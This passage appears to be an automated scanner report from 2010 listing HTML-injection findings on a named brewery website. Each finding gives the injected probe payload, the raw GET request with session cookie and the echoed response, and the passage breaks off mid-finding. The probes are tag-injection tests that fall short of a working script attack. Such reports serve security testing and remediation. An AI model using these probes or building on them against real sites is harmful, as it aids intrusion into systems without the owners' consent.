This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content1074f"><a>3bd48f0635/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content1074f"><a>3bd48f0635_page" class="content1074f">
...[SNIP]...

1.75. http://www.ninkasibrewing.com/content/css/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/css/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39f27"><a>d2ed1bcbe0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content39f27"><a>d2ed1bcbe0a/css/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content39f27"><a>d2ed1bcbe0a_page" class="content39f27">
...[SNIP]...

1.76. http://www.ninkasibrewing.com/content/css/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/css/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de265"><a>99351a372e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentde265"><a>99351a372e/css/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentde265"><a>99351a372e_page" class="contentde265">
...[SNIP]...

1.77. http://www.ninkasibrewing.com/content/css/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/css/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a84a9"><a>f8f239e2cf0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contenta84a9"><a>f8f239e2cf0/css/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contenta84a9"><a>f8f239e2cf0_page" class="contenta84a9">
...[SNIP]...

1.78. http://www.ninkasibrewing.com/content/css/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/css/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6505"><a>a690865482b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentd6505"><a>a690865482b/css/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentd6505"><a>a690865482b_page" class="contentd6505">
...[SNIP]...

1.79. http://www.ninkasibrewing.com/content/css/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/css/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db76d"><a>d3d2af91b6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentdb76d"><a>d3d2af91b6b/css/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentdb76d"><a>d3d2af91b6b_page" class="contentdb76d">
...[SNIP]...

1.80. http://www.ninkasibrewing.com/content/css/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/css/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1e8c"><a>4b2c3c0e6c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentb1e8c"><a>4b2c3c0e6c7/css/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentb1e8c"><a>4b2c3c0e6c7_page" class="contentb1e8c">
...[SNIP]...

1.81. http://www.ninkasibrewing.com/content/css/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/css/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f196b"><a>845524f273a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentf196b"><a>845524f273a/css/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentf196b"><a>845524f273a_page" class="contentf196b">
...[SNIP]...

1.82. http://www.ninkasibrewing.com/content/img/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45663"><a>8b95a448cfa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content45663"><a>8b95a448cfa/img/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content45663"><a>8b95a448cfa_page" class="content45663">
...[SNIP]...

1.83. http://www.ninkasibrewing.com/content/img/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1441f"><a>7fd0b4d00b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content1441f"><a>7fd0b4d00b1/img/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content1441f"><a>7fd0b4d00b1_page" class="content1441f">
...[SNIP]...

1.84. http://www.ninkasibrewing.com/content/img/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 718f2"><a>c3b71b0f726 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content718f2"><a>c3b71b0f726/img/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content718f2"><a>c3b71b0f726_page" class="content718f2">
...[SNIP]...

1.85. http://www.ninkasibrewing.com/content/img/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be5a8"><a>50fc2122c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentbe5a8"><a>50fc2122c0/img/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentbe5a8"><a>50fc2122c0_page" class="contentbe5a8">
...[SNIP]...

1.86. http://www.ninkasibrewing.com/content/img/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d58e6"><a>673bbcd9798 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentd58e6"><a>673bbcd9798/img/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentd58e6"><a>673bbcd9798_page" class="contentd58e6">
...[SNIP]...

1.87. http://www.ninkasibrewing.com/content/img/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a62b0"><a>552d9ff3d4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contenta62b0"><a>552d9ff3d4d/img/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contenta62b0"><a>552d9ff3d4d_page" class="contenta62b0">
...[SNIP]...

1.88. http://www.ninkasibrewing.com/content/img/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 874f9"><a>3827eb81fc7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content874f9"><a>3827eb81fc7/img/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content874f9"><a>3827eb81fc7_page" class="content874f9">
...[SNIP]...

1.89. http://www.ninkasibrewing.com/content/img/skin/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b7fb"><a>d9b89a79e3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content1b7fb"><a>d9b89a79e3e/img/skin/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content1b7fb"><a>d9b89a79e3e_page" class="content1b7fb">
...[SNIP]...

1.90. http://www.ninkasibrewing.com/content/img/skin/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 751d3"><a>fcf7cbffa31 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content751d3"><a>fcf7cbffa31/img/skin/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content751d3"><a>fcf7cbffa31_page" class="content751d3">
...[SNIP]...

1.91. http://www.ninkasibrewing.com/content/img/skin/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8616a"><a>5ae4af16787 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content8616a"><a>5ae4af16787/img/skin/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content8616a"><a>5ae4af16787_page" class="content8616a">
...[SNIP]...

1.92. http://www.ninkasibrewing.com/content/img/skin/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b3e"><a>f6c375e180b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

